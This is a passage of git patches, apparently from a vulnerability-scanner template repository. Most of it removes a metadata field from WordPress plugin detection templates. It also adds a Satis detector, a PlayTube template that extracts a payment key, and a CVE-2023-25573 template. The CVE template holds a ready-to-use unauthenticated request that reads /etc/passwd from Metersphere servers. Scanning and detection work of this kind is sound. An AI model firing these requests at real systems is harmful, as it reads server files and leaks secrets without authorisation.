https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 3c923bef996652e47b43209ec1e0f5ac3bbccb3b Mon Sep 17 00:00:00 2001 From: FlorianMaak Date: Thu, 14 Sep 2023 13:01:07 +0200 Subject: [PATCH 0345/1090] Create satis-repository.yaml Create detection to check for satis servers, hosting composer repositories. --- http/exposed-panels/satis-repository.yaml | 36 +++++++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/exposed-panels/satis-repository.yaml diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml new file mode 100644 index 0000000000..3aa1204578 --- /dev/null +++ b/http/exposed-panels/satis-repository.yaml @@ -0,0 +1,36 @@ +id: satis-repository + +info: + name: Satis Composer Repository - Detect + author: FlorianMaak + severity: info + description: Satis composer repository was detected + reference: + - https://github.com/composer/satis + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + metadata: + max-request: 1 + verified: true + shodan-query: html:"Satis" + tags: exposure,composer,satis + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "This is a private Composer repository" + - "Satis" + condition: and + + - type: status + status: + - 200 From 646084dced47c3ff109016270e9ce78f011d2bec Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Sep 2023 20:29:27 +0530 Subject: [PATCH 0346/1090] Create CVE-2023-25573.yaml --- http/cves/2023/CVE-2023-25573.yaml | 58 ++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 http/cves/2023/CVE-2023-25573.yaml diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml new file mode 100644 index 0000000000..2fe3768351 --- /dev/null +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -0,0 +1,58 @@ +id: CVE-2023-25573 + +info: + name: Metersphere - Arbitrary File Read + author: DhiyaneshDK + severity: high + description: | + metersphere is an open source continuous testing platform. In affected versions an improper access control vulnerability exists in `/api/jmeter/download/files`, which allows any user to download any file without authentication. This issue may expose all files available to the running process. This issue has been addressed in version 1.20.20 lts and 2.7.1 + remediation: Users are advised to upgrade. There are no known workarounds for this vulnerability. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Metersphere%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2023-25573.md + - https://nvd.nist.gov/vuln/detail/CVE-2023-25573 + - https://github.com/metersphere/metersphere/security/advisories/GHSA-mcwr-j9vm-5g8h + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2023-25573 + cwe-id: CWE-862 + epss-score: 0.00084 + epss-percentile: 0.34763 + cpe: cpe:2.3:a:metersphere:metersphere:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: metersphere + product: metersphere + fofa-query: body="Metersphere" + tags: cve,cve2023,metersphere,lfi + +variables: + str: "{{rand_base(4)}}" + rand: "{{rand_base(3)}}" + +http: + - raw: + - | + POST /api/jmeter/download/files HTTP/1.1 + Content-Type: application/json + + {"reportId":"{{str}}","bodyFiles":[{"id":"{{rand}}","name":"/etc/passwd"}]} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '/etc/passwd' + + - type: word + part: header + words: + - 'filename="{{str}}.zip"' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 From 9e2b1fa6988c263c3d28ae9672dd1c8475e4b184 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Sep 2023 20:34:56 +0530 Subject: [PATCH 0347/1090] Update CVE-2023-25573.yaml --- http/cves/2023/CVE-2023-25573.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-25573.yaml b/http/cves/2023/CVE-2023-25573.yaml index 2fe3768351..c29889e762 100644 --- a/http/cves/2023/CVE-2023-25573.yaml +++ b/http/cves/2023/CVE-2023-25573.yaml @@ -36,7 +36,7 @@ http: - | POST /api/jmeter/download/files HTTP/1.1 Content-Type: application/json - + {"reportId":"{{str}}","bodyFiles":[{"id":"{{rand}}","name":"/etc/passwd"}]} matchers-condition: and From a35edf9795143c10fe61990880961d228da51986 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Sep 2023 20:38:32 +0530 Subject: [PATCH 0348/1090] Create CVE-2023-4714.yaml --- http/cves/2023/CVE-2023-4714.yaml | 41 +++++++++++++++++++++++++++++++ 1 file changed, 41 insertions(+) create mode 100644 http/cves/2023/CVE-2023-4714.yaml diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml new file mode 100644 index 0000000000..0fdeddcb94 --- /dev/null +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -0,0 +1,41 @@ +id: CVE-2023-4714 + +info: + name: PlayTube 3.0.1 - Redirect Information Disclosure + author: Farish + severity: high + description: | + A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-4714 + - https://www.exploitalert.com/view-details.html?id=39826 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 + metadata: + verified: "true" + tags: cve,cve2023,unauth,info-leak + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "razorpay_options" + - "PlayTube" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'key: "([a-z_A-Z0-9]+)"' From 3d99f465a6b17212fdc4c9d65d6c5ebb17bc9238 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Sep 2023 20:41:26 +0530 Subject: [PATCH 0349/1090] Update CVE-2023-4714.yaml --- http/cves/2023/CVE-2023-4714.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 0fdeddcb94..d85808d771 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -16,7 +16,7 @@ info: metadata: verified: "true" tags: cve,cve2023,unauth,info-leak - + http: - method: GET path: From b2adcac4a4820349643f87ac705e35c288894c1b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 14 Sep 2023 20:54:16 +0530 Subject: [PATCH 0350/1090] Update satis-repository.yaml --- http/exposed-panels/satis-repository.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/satis-repository.yaml b/http/exposed-panels/satis-repository.yaml index 3aa1204578..62d21190f5 100644 --- a/http/exposed-panels/satis-repository.yaml +++ b/http/exposed-panels/satis-repository.yaml @@ -4,7 +4,8 @@ info: name: Satis Composer Repository - 